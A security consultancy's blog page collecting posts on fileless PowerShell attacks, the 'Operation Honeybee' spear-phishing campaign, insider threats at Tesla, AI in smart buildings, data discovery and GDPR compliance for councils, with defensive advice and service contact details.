Fileless Attacks: How do you protect your organisation from a threat you can’t see?

Fileless Attacks: The Threat You Can’t See

Fileless attacks are on the rise. A study by the Ponemon Institute found that 29% of the attacks faced by organisations during 2017 were fileless. This number has been increasing year on year and is expected to reach 35% in 2018.

The reason for this increase is simple. Hackers know they stand a greater chance of succeeding with a fileless attack because they are more difficult to detect. Traditional anti-malware and anti-virus tools search for malicious software by scanning a computer’s hard drive. This has led cybercriminals to pursue attacks that avoid the hard drive altogether.

How do file-less attacks work?

To avoid the hard drive, hackers hide malicious code in memory instead, using authorised native programs and tools within the operating system to attack by stealth.

This is how an attack against your organisation could occur:

  1. An employee receives a spam email with a link to a malicious website.
  2. The employee clicks on the link.
  3. The malicious website loads an authorised program, such as Flash, on the employee’s computer and exploits its known vulnerabilities.
  4. The program then opens Windows PowerShell, a native Windows tool, which is able to execute instructions through the command line while operating in memory.
  5. PowerShell downloads and runs a malicious script.
  6. The PowerShell script locates data on the employee’s computer and sends it to the attacker.

Using authorised applications already installed on the target’s computer is more discrete than placing a file on the user’s computer. The hacker can undertake the same types of attack as they otherwise could, such as ransomware attacks for example, but is far less likely to be noticed. This is why it is essential to swiftly patch and update your operating systems and software applications.

Although not truly a ‘fileless’ attack, the same attack could occur if an employee opens a Word or PDF document sent from a malicious source. With a Word document for instance, the attack will use a Microsoft Office macro to launch PowerShell and run the hacker’s script. Programmes such as Adobe PDF Reader and Javascript all have known vulnerabilities which hackers seek to use to their advantage.

Fileless attacks will continue to rise until organisations become effective at identifying and defending themselves from this type of attack. Cybersecurity tools that learn and analyse patterns of behaviour are better placed to spot unusual activity on your networks, which could afford some protection against fileless attacks.

However, relying on cybersecurity tools alone is not enough. Training staff to recognise fraudulent and spam emails also needs to be a crucial element of your cybersecurity strategy. Spam emails are becoming less obvious to spot, often looking near identical to emails from a legitimate source. The few seconds it takes an employee to check the sender’s email address is accurate could be the difference between a successful and unsuccessful attack against your company.

As new modes of threat emerge, organisations must rethink the ways they protect themselves, and analyse the cybersecurity tools they use.

 

Implementing responsible AI from the start

Digital Pathways’ Colin Tankard looks at how we reap the rewards of AI while avoiding the risks.

Artificial intelligence (AI) and machine learning (ML) are two very hot buzzwords right now and often seem to be used interchangeably. They are not quite the same thing, but the perception that they are can sometimes lead to confusion.

Machine learning is a type of artificial intelligence (AI) that allows software applications to become more accurate in predicting outcomes, without being explicitly programmed.

AI is the process of simulating human intelligence, using machines, especially computer systems. The process includes learning (the acquisition of information and rules for using the information), reasoning (using the rules to reach approximate or definite conclusions) and self-correction.

In smart buildings, AI is already being used to control the environmental needs of the people working within the building. For example, monitoring the volume of people in any area and using this intelligence to decide if ’air-con’ should be switched on or if the lowering of shades or opening of windows will suffice.

Another example is the controlling of the smart building environment outside of hours, by counting the number of people in the building, or noting when unusual events happen, and acting accordingly.

All of this, and more, is with us today and will continue to expand into our daily business and personal lives.

Data security

Although the benefits look good, there is a fear that such AI programs could ’go rogue’ and turn on us, or be hacked by other AI programs. Hackers love artificial intelligence as much as everyone else in the technology space and are increasingly using AI to improve their phishing attacks. The need for innovative and robust data security therefore becomes even more important to the management of the smart building than it is at present.

Read the full article here in Smart Cities World

Tesla Feel The Heat Of An Insider Threat

Tesla, the luxury electric car maker, seem to have fallen foul of an insider threat episode, with Elon Musk, warning that a disgruntled staff member had altered the company’s IT system code, harvesting highly sensitive information and giving it to others.

Traditionally, the term ‘Insider Threat’ does indeed invoke images of malicious employees lurking in the shadows of an office attempting to steal company secrets or bring down the system. The reality is, that this form of ‘evil insider’ is infrequent at most companies, though clearly not Tesla, with instances of such threats occurring once in a ‘blue moon’. The real issue and biggest risk to confidential data, is the negligent employee, more commonly categorised as the ‘Unintentional Insider Threat’.

It is common that when a cyber security professional attempts to speak with C-level management about mitigating and even preventing the Insider Threat, the feedback they receive is along the lines of, ‘everyone here is happy. We don’t have disgruntled employees, so we don’t have to worry about Insider Threat!’

Perhaps that is true. But, if you ‘turn the conversation on its head’ and talk about the Insider Threat as unintentional threats; employees who make mistakes – inadvertently causing harm – executives listen.

A Verizon 2015 data breach investigation report showed that ‘Insiders’ are responsible for 90% of security incidents and of these 29% are deliberate and malicious whilst 71% are unintentional, with misuse of systems, log-in/log-out failures, with cloud storage leading the way.

There is no doubt that organisations that understand, address & focus on minimising the damage from the Insider Threat, are going to be the companies that win. And, remember, even if your technologies are not obsolete, you will still need to augment your security protocols for Insider Threats and Unintentional Insider Threats.

Read the full article here in Global Security Magazine 

How are Word-based fileless attacks targeting aid organisations?

Imagine you have opened a Word file that was emailed to you by a prominent organisation in your field. On the surface, nothing else happens. You notice no changes and your antivirus system doesn’t detect anything suspicious. Would you (or your employees) expect to be spied on by hackers?

This March, McAfee identified a new fileless hacking operation which is targeting humanitarian aid organisations worldwide. ‘Operation Honeybee’ tricks its targets into opening compromised Word documents. When this is achieved, their malware takes hold in the computer and allows the hackers to spy on their target undetected. They are able to escape scrutiny because of their fileless strategy.

There has been a surge in fileless attacks. A study by the Ponemon Institute predicts they will comprise 35% of all cyberattacks in 2018. As hard drive-focused antivirus scanners become more effective, hackers are resorting to strategies which do not leave files in your directory. Instead, they exploit known weaknesses in legitimate programs which are already on your computer. Once they have gained a foothold there, they can run commands which allows them to spy on you, mine cryptocurrency, ransom your files, and even take over your entire system.

 Honeybee and spear phishing pierce your defences

Another dangerous aspect of the Honeybee operation is its use of ‘spear phishing’; a more sophisticated form of phishing. Where ordinary phishing campaigns send out misleading emails in bulk, and cross their fingers, spear phishing tailors its message to appeal to a particular target in order to increase its chances of success.

In the case of Honeybee, the hackers designed their initial email to pass for a message from the International Red Cross. They then used the decoy document to ambush employees of the aid organisations they wanted to spy on.

The Red Cross is a perfect disguise for a spear phishing operation, as it is a well-known, trusted organisation. Combining this with the fileless nature of the attack, it is even more likely to escape detection. This joint strategy can be adapted to target any industry.

Joint strategy; twofold solution

If hackers are purposefully evading traditional antivirus strategies, how can you keep your system safe? There is a twofold solution.

First of all, there are innovative antivirus programs which do protect against fileless attacks. The latest cybersecurity tools use machine learning to pinpoint unusual activity on your system. This allows them to eliminate threats which would otherwise remain hidden.

Secondly, you can implement a training strategy which will increase awareness of the strategies used by hackers. When properly prepared, members of your organisation can neutralise a threat by taking as little as a minute to verify the source of emails they receive. It really can be that simple.

Every organisation can benefit from added protection. Give us a call on 0844 586 0040, or email intouch@digitalpathways.co.uk, and we’ll be happy to advise you.

 

Streamlining data discovery

Understanding what unstructured data exists in the enterprise is not easy. Massive volumes of documents, spreadsheets, presentations and emails are typically scattered about an organisation.

With no real tools to manage it based on business value, it accumulates with no end in sight. The easy option is to buy more storage but that doesn’t fix the problem. Continue and you have hundreds of terabytes or petabytes of unstructured user content with no way to classify and manage the data according to its value. But by breaking it down into multiple iterative steps, starting high and working down to a level of detail to satisfy all stakeholders, order can be achieved.

Read the full article in Network Security Magazine here on page 20

Building trust: what GDPR can do for your council

In 2017, Basildon Council was fined £150,000 for failing to store personal data securely. Because there was no adequate data protection policy in place, details of a family’s disabilities, including mental health issues, were published online. They remained publicly accessible for weeks. This incident had huge reputational and financial repercussions for the Council.

The £150,000 fine was imposed under the old Data Protection Act. With the enforcement of GDPR in May, ICO are now able to impose higher fines, which go up to 4% of the organisation’s turnover, or €20,000,000, whichever is greater. What’s more, the scope of the new legislation is far broader, setting higher standards of transparency for any organisation that handles EU citizens’ data.

Councils are already failing internal audits and incurring fines on an annual basis. What will happen now GDPR is enforceable? Unless action is taken now, councils stand to fall short of the new rules, and be subject to the new fines. Yet the purpose of GDPR is to protect citizens’ rights, not to cause councils to incur avoidable costs. How can GDPR help councils prevent the kind of incident Basildon has seen, and foster trust among residents?

How GDPR can help?

There is a lot of apprehension among residents regarding their privacy. Who holds my data, and why? If personal data is stored, is it being held securely? GDPR is designed to provide answers to those questions.

If an organisation is GDPR compliant, it means that personal data is only being stored when strictly necessary, and under the best possible safeguards. More than that, GDPR puts control over data back into citizens’ hands, creating a new era of transparency. This is how GDPR, instead of remaining a looming spectre, can become a tool for councils to build trust.

The task for councils is clear: they must be able to map out the exact course data takes through their systems. When a resident requests to see their personal data, the council must be able to recover it. If you imagine the amount of data currently in the hands of councils, much of it in archival storage, you will see that this is a huge undertaking.

There are other liabilities councils may not even be aware of, such as their Active Directory management. Too often, when council employees change roles, their accounts remain active. This means that they can be exploited by disgruntled ex-employees, and even become targets for hackers. By implementing a system which closes obsolete accounts, councils can ensure that access is granted only to the right people.

There are big cost-saving benefits to be achieved by creating a safe, streamlined and transparent data policy. As well as avoiding fines and passing internal audits, in the process of becoming GDPR compliant, councils can effect substantial savings by reducing their storage of obsolete data.

We have the experience and expertise to reform your data management. If you are a council looking for a GDPR compliancy solution, please contact us on 0844 586 0040 or intouch@digitalpathways.co.uk.